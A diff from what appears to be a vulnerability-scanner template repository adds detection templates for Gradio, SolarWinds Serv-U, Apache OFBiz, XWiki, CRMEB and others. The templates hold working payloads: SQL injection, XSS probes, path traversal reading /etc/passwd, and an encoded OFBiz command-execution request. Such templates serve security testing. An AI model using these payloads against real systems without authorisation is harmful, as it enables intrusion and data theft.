 {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"}
@@ -2426,6 +2432,7 @@
 {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"}
 {"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"}
 {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"}
+{"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"}
 {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"}
 {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"}
 {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"}

cves.json-checksum.txt

@@ -1 +1 @@
-ccfb062d74fe49f673c3566b7bedbb47
+5bf79d4f9b6c31dc26f1ae2f9acb7675

dast/vulnerabilities/sqli/time-based-sqli.yaml

@@ -0,0 +1,50 @@
+id: time-based-sqli
+
+info:
+  name: Time-Based Blind SQL Injection
+  author: 0xKayala
+  severity: critical
+  description: |
+    This Template detects time-based Blind SQL Injection vulnerability
+  tags: sqli,dast,time-based,blind
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration<=7"
+
+  - raw:
+      - |
+        @timeout: 20s
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      injection:
+        - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
+        - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
+        - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
+        - "if(now()=sysdate(),SLEEP(7),0)"
+        - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
+        - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{injection}}"
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration>=7 && duration <=16"
+# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950

dast/vulnerabilities/xss/reflected-xss.yaml

@@ -1,8 +1,8 @@
 id: reflected-xss
 
 info:
-  name: Reflected Cross Site Scripting
-  author: pdteam
+  name: Reflected Cross-Site Scripting
+  author: pdteam,0xKayala
   severity: medium
   metadata:
     max-request: 1
@@ -19,7 +19,9 @@ http:
 
     payloads:
       reflection:
-        - "'\"><{{first}}"
+        - "'\"><{{first}}>"
+        - "'><{{first}}>"
+        - "\"><{{first}}>"
 
     fuzzing:
       - part: query
@@ -40,4 +42,4 @@ http:
         part: header
         words:
           - "text/html"
-# digest: 4a0a0047304502205821d73014fc8d11f73cd6310b813fe726e0a079b64f64e68b4ec264862ca17e0221008b5588348307f431509fb585b4920dc44a9de1f9330154b012be8dc4520fd47d:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100fe9d1b6a33bc101017c0dabac57b282164ad7a316747fb641b1be7dd534178b2022100b1b90ca968e766279c306212b849ce875ae2beaced34248794387b56192c1878:922c64590222798bb761d5b6d8e72950

helpers/wordlists/headers.txt

@@ -1964,6 +1964,8 @@ x-from
 X-Fruit
 X-Fully-Authenticated
 X-Furcadia-Allow-Caching
+x-functions-key
+x-functions-clientid
 x-fv
 X-Galleries
 X-Gallery-Type
@@ -2914,4 +2916,4 @@ ZOOPLUS_ORIGINAL_COMPLETE_URL
 zotero-api-version
 zotero-write-token
 ZRL_CMP
-ZXY
+ZXY

http/cves/2020/CVE-2020-8115.yaml

@@ -48,7 +48,13 @@ http:
         regex:
           - (?mi)window\.location\.replace\(".*alert\(1337\)
 
+      - type: word
+        part: body
+        words:
+          - window.location.href.indexOf
+        negative: true
+
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ecd7675c422b5c9949a8ab6d201f35ee87e4502aad45359f825eb31c2f2fbd72022100aa92159e5d4b1010b07101e6b6f47d858170d3f8e97aa5db3c6c7a259bfe4b71:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502201c457a2f1b36aa9047f64d583625469bc74369b0b7e4aabe3b116e0738efe55c0221009fbcbd6ae813de05fe1f4fcd785a0cb566dba7d3d8f3ed26faf9555b57561095:922c64590222798bb761d5b6d8e72950

http/cves/2021/CVE-2021-43831.yaml

@@ -0,0 +1,54 @@
+id: CVE-2021-43831
+
+info:
+  name: Gradio < 2.5.0 - Arbitrary File Read
+  author: isacaya
+  severity: high
+  description: |
+    Files on the host computer can be accessed from the Gradio interface
+  impact: |
+    An attacker would be able to view the contents of a file on the computer.
+  remediation: |
+    Update to version 2.5.0.
+  reference:
+    - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr
+    - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 7.7
+    cve-id: CVE-2021-43831
+    cwe-id: CWE-22
+    epss-score: 0.00063
+    epss-percentile: 0.26511
+    cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
+  metadata:
+    vendor: gradio_project
+    product: gradio
+    framework: python
+    shodan-query: title:"Gradio"
+  tags: cve,cve2021,lfi,gradio
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}"
+
+    payloads:
+      path:
+        - /etc/passwd
+        - /windows/win.ini
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+# digest: 490a00463044022032ecd11c32d5ba5b3a614d6572928a93718eecf820b73a7ed7613c012085b9af02207bceba36fe78c3968f2ca537e592c5f1c5e3aee5a141a64a0d7a9932c9f3af4d:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-32068.yaml

@@ -0,0 +1,42 @@
+id: CVE-2023-32068
+
+info:
+  name: XWiki - Open Redirect
+  author: ritikchaddha
+  severity: medium
+  description: |
+    XWiki Platform is vulnerable to open redirect attacks due to improper validation of the xredirect parameter. This allows an attacker to redirect users to an arbitrary website. The vulnerability is patched in versions 14.10.4 and 15.0.
+  impact: |
+    An attacker can craft malicious URLs to redirect users to malicious websites.
+  remediation: |
+    Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities.
+  reference:
+    - https://jira.xwiki.org/browse/XWIKI-20096
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-32068
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2023-32068
+    cwe-id: CWE-601
+    epss-score: 0.00149
+    epss-percentile: 0.50372
+    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: xwiki
+    product: xwiki
+    shodan-query: html:"data-xwiki-reference"
+    fofa-query: body="data-xwiki-reference"
+  tags: cve,cve2023,xwiki,redirect
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"
+
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
+# digest: 490a00463044022022611f58439e1b8aa2bf5df976f3774aa14e202e26280efda8267481141f80de022050cc9f2a7c4906ef5bc096ec3ca0ccad1892f139eae285db8a964bd5a5b11f7d:922c64590222798bb761d5b6d8e72950

http/cves/2023/CVE-2023-51449.yaml

@@ -0,0 +1,84 @@
+id: CVE-2023-51449
+
+info:
+  name: Gradio Hugging Face - Local File Inclusion
+  author: nvn1729
+  severity: high
+  description: |
+    Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
+  reference:
+    - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
+    - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-51449
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-51449
+    cwe-id: CWE-22
+    epss-score: 0.00064
+    epss-percentile: 0.27836
+    cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: gradio_project
+    product: gradio
+    framework: python
+    shodan-query: html:"__gradio_mode__"
+    fofa-query: body="__gradio_mode__"
+  tags: cve,cve2024,lfi,gradio,unauth,intrusive
+
+variables:
+  str: '{{rand_base(8)}}'
+
+http:
+  - raw:
+      - |
+        POST /upload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
+
+        -----------------------------250033711231076532771336998311
+        Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
+        Content-Type: application/octet-stream
+
+        {{str}}
+        -----------------------------250033711231076532771336998311--
+
+      - |
+        GET /file={{download_path}}{{path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        name: download_path
+        internal: true
+        group: 1
+        regex:
+          - "\\[\"(.+)okmijnuhbygv\"\\]"
+
+    payloads:
+      path:
+        - ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
+        - ../../../../../../../../../../../../../../../etc/passwd
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+
+      - type: word
+        part: content_type
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
+# digest: 490a0046304402202afd5a76a8709b9e353a87ab56a8aef3d1afa2739156058f4a7cd46c851390400220687bf99017b86a6013b449d53d1c9b790e8e7b4ba7aec6fe2292b87a11d4527c:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-1561.yaml

@@ -1,11 +1,11 @@
 id: CVE-2024-1561
 
 info:
-  name: Gradio Applications - Local File Read
-  author: Diablo
+  name: Gradio 4.3-4.12 - Local File Read
+  author: nvn1729,Diablo
   severity: high
   description: |
-    Local file read by calling arbitrary methods of Components class
+    Local file read by calling arbitrary methods of Components class between Gradio versions 4.3-4.12
   impact: |
     Successful exploitation of this vulnerability could allow an attacker to read files on the server
   remediation: |
@@ -16,6 +16,7 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
     - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
     - https://www.gradio.app/changelog#4-13-0
+    - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -25,50 +26,52 @@ info:
     epss-percentile: 0.36659
   metadata:
     verified: true
-    max-request: 3
+    max-request: 2
     shodan-query: html:"__gradio_mode__"
   tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
-flow: http(1) && http(2) && http(3)
 
 http:
-  - raw:
-      - |
-        GET /config HTTP/1.1
-        Host: {{Hostname}}
-
-    extractors:
-      - type: json
-        name: first-component
-        part: body
-        group: 1
-        json:
-          - '.components[0].id'
-        internal: true
-
   - raw:
       - |
         POST /component_server HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
+        {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaaaaaaa"}
+
+      - |
+        GET /file={{download_path}} HTTP/1.1
+        Host: {{Hostname}}
 
     extractors:
       - type: regex
-        name: tmpath
-        regex:
-          - \/[a-zA-Z0-9\/]+
+        part: body
+        name: download_path
         internal: true
+        group: 1
+        regex:
+          - "\"?([^\"]+)"
 
-  - raw:
-      - |
-        GET /file={{tmpath}} HTTP/1.1
-        Host: {{Hostname}}
+    payloads:
+      path:
+        - c:\\windows\\win.ini
+        - /etc/passwd
 
+    stop-at-first-match: true
+    matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - regex('root:.*:0:0:', body)
-          - 'contains(header, "text/plain")'
-        condition: and
-# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+
+      - type: word
+        part: content_type
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200

http/cves/2024/CVE-2024-1728.yaml

@@ -0,0 +1,74 @@
+id: CVE-2024-1728
+
+info:
+  name: Gradio > 4.19.1 UploadButton - Path Traversal
+  author: isacaya
+  severity: high
+  description: |
+    gradio-app/gradio is vulnerable to a local file inclusion vulnerability due to improper validation of user-supplied input in the UploadButton component.
+  impact: |
+    Attackers can exploit this vulnerability to read arbitrary files on the filesystem, such as private SSH keys, by manipulating the file path in the request to the `/queue/join` endpoint. This issue could potentially lead to remote code execution. The vulnerability is present in the handling of file upload paths, allowing attackers to redirect file uploads to unintended locations on the server.
+  remediation: |
+    Update to version 4.19.2.
+  reference:
+    - https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7
+    - https://huntr.com/bounties/9bb33b71-7995-425d-91cc-2c2a2f2a068a
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-1728
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-1728
+    cwe-id: CWE-22
+    epss-score: 0.00044
+    epss-percentile: 0.10164
+  metadata:
+    max-request: 5
+    verified: true
+    vendor: gradio
+    product: gradio
+    shodan-query: html:"__gradio_mode__"
+  tags: cve,cve2024,lfi,gradio,intrusive
+
+http:
+  - raw:
+      - |
+        POST /queue/join? HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"data":[[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549,"mime_type":"text/markdown"}]],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"}
+
+      - |
+        GET /queue/data?session_hash={{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /file={{extracted_path}} HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: extracted_path
+        regex:
+          - "/tmp/gradio/.*/passwd"
+          - "C:.*\\win\\.ini"
+        internal: true
+
+    payloads:
+      path:
+        - /etc/passwd
+        - /windows/win.ini
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+
+      - type: status
+        status:
+          - 200
+# digest: 4a0a0047304502200f825f20fad4b54e4c1edb052482ff3d57c02b63e05a9cf6227b37d39ebee112022100b36cc92a5b2685c8da867167fa0fdc31e99e6d9d6a461ff14467d518c3904dc2:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-2621.yaml

@@ -0,0 +1,43 @@
+id: CVE-2024-2621
+
+info:
+  name: Fujian Kelixin Communication - Command Injection
+  author: DhiyaneshDk
+  severity: medium
+  description: |
+    A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php.
+  reference:
+    - https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-pwd_update.php.pdf
+    - https://vuldb.com/?ctiid.257198
+    - https://vuldb.com/?id.257198
+    - https://github.com/NaInSec/CVE-LIST
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-2621
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 6.3
+    cve-id: CVE-2024-2621
+    cwe-id: CWE-89
+    epss-score: 0.00045
+    epss-percentile: 0.15047
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: body="app/structure/departments.php" || app="指挥调度管理平台"
+  tags: cve,cve2024,sqli,fujian,rce
+
+http:
+  - raw:
+      - |
+        @timeout 15s
+        GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'status_code == 200'
+          - 'contains_all(body,"msg\":","header\":","code\":")'
+        condition: and
+# digest: 4a0a00473045022100a52b0c5b76efaf890e2a47563d494a96fce85d7358a34a0b2ed4027e0dc1c2d202206721b9c12ec93f014b0111b14d53ef8e69c79a19ec1eb23f367c7823881fcd2f:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-28995.yaml

@@ -0,0 +1,53 @@
+id: CVE-2024-28995
+
+info:
+  name: SolarWinds Serv-U - Directory Traversal
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    SolarWinds Serv-U was susceptible to a directory transversal vulnerability that would allow access to read sensitive files on the host machine.
+  reference:
+    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-28995
+    - https://x.com/stephenfewer/status/1801191416741130575
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-28995
+    cwe-id: CWE-22
+    cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: solarwinds
+    product: serv-u
+    shodan-query: html:"Serv-U"
+    fofa-query: server="Serv-U"
+  tags: cve,cve2024,lfi,solarwinds,serv-u
+
+http:
+  - raw:
+      - |
+        GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+
+      - type: dsl
+        dsl:
+          - 'contains(header, "Serv-U")'
+          - 'status_code == 200'
+        condition: and
+# digest: 4a0a00473045022100f7464125ccd5146080c76c675872c18c8bd0eb548bb8b1ba0cb9a979e4a8db9b02204c5cfd2b1ac281a288ed84c4fe0fe06376db38e710553793adf0216811a0a537:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-31750.yaml

@@ -0,0 +1,41 @@
+id: CVE-2024-31750
+
+info:
+  name: F-logic DataCube3 - SQL Injection
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    SQL injection vulnerability in f-logic datacube3 v.1.0 allows a remote attacker to obtain sensitive information via the req_id parameter.
+  reference:
+    - https://github.com/lampSEC/semcms/blob/main/datacube3.md
+    - https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/DataCube3%20getting_index_data.php%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-31750
+    - https://github.com/wjlin0/poc-doc
+    - https://github.com/wy876/POC
+  classification:
+    cve-id: CVE-2024-31750
+    epss-score: 0.00043
+    epss-percentile: 0.0866
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: title="DataCube3"
+  tags: cve,cve2024,datacube3,sqli
+
+http:
+  - raw:
+      - |
+        POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        req_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq")'
+          - 'contains(header, "application/json")'
+          - 'status_code==200'
+        condition: and
+# digest: 4a0a00473045022100debf69f7baa1e23b7f3488c09e93e1909abfdc7a1ea2603f6dba2cb9c703544302203d8ecbf6c297515767d7ed66820e5a80fda576b6ed82be4d00362838d096b5bc:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-32113.yaml

@@ -0,0 +1,49 @@
+id: CVE-2024-32113
+
+info:
+  name: Apache OFBiz Directory Traversal - Remote Code Execution
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13
+  remediation: |
+    Users are recommended to upgrade to version 18.12.13, which fixes the issue.
+  reference:
+    - https://issues.apache.org/jira/browse/OFBIZ-13006
+    - https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd
+    - https://ofbiz.apache.org/download.html
+    - https://ofbiz.apache.org/security.html
+    - https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-32113
+  classification:
+    cve-id: CVE-2024-32113
+    epss-score: 0.00115
+    epss-percentile: 0.45112
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="Apache_OFBiz"
+  tags: cve,cve2024,apache,obiz,rce
+
+http:
+  - raw:
+      - |
+        POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "java.lang.Exception:"
+          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100b88041381f7eeda038aa86589d4e8abaa41ddf477aafea6cd9271bdafa02ebb6022100dfb966a119b54853c7b4d4ea44205600d7bf2227910f32cd964a08a2cf91571d:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-3274.yaml

@@ -0,0 +1,38 @@
+id: CVE-2024-3274
+
+info:
+  name: D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure
+  author: DhiyaneshDk
+  severity: medium
+  description: |
+    A vulnerability has been found in D-Link DNS-320L, DNS-320LW and DNS-327L up to 20240403 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/info.cgi of the component HTTP GET Request Handler.
+  reference:
+    - https://github.com/netsecfish/info_cgi
+    - https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-3274
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2024-3274
+    cwe-id: CWE-200
+    epss-score: 0.00045
+    epss-percentile: 0.15047
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: body="Text:In order to access the ShareCenter"
+  tags: cve,cve2024,dlink,exposure
+
+http:
+  - raw:
+      - |
+        GET /cgi-bin/info.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "Model=", "Build=", "Macaddr=")'
+          - 'status_code == 200'
+        condition: and
+# digest: 490a004630440220637a70951ffd4c3d81671b37a51e678c922a409e791bdbb538ad6cce7bb84fad0220303256e098c2a99c41e54b1518da46ac7d1910401c97102c6afaa5f2490973d9:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-36837.yaml

@@ -0,0 +1,43 @@
+id: CVE-2024-36837
+
+info:
+  name: CRMEB v.5.2.2 - SQL Injection
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.
+  reference:
+    - https://github.com/phtcloud-dev/CVE-2024-36837
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-36837
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: title="CRMEB"
+  tags: cve,cve2024,crmeb,sqli
+
+variables:
+  num: "{{rand_int(9000000, 9999999)}}"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{md5(num)}}"
+          - "SQLSTATE"
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+# digest: 490a0046304402203044d17d81b224dafab0f052edc09852ae126401a2350dcbed817e3a8d32b6840220266a399dff53e7dd81a0eeea14d4f29ab5039fee825cd84700698d76b30c8e7f:922c64590222798bb761d5b6d8e72950

http/exposed-panels/ibm/ibm-note-login.yaml

@@ -2,7 +2,7 @@ id: ibm-note-login
 
 info:
   name: IBM iNotes Login Panel - Detect
-  author: dhiyaneshDK
+  author: dhiyaneshDK,righettod
   severity: info
   description: IBM iNotes login panel was detected.
   reference:
@@ -14,22 +14,28 @@ info:
   metadata:
     max-request: 2
     vendor: ibm
